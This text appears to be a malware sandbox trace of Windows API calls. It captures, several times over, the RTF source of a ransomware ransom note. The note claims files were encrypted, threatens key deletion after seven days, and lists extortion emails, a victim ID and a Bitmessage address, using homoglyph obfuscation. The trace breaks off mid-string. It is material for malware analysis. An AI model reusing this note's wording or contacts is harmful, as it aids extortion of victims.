\\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 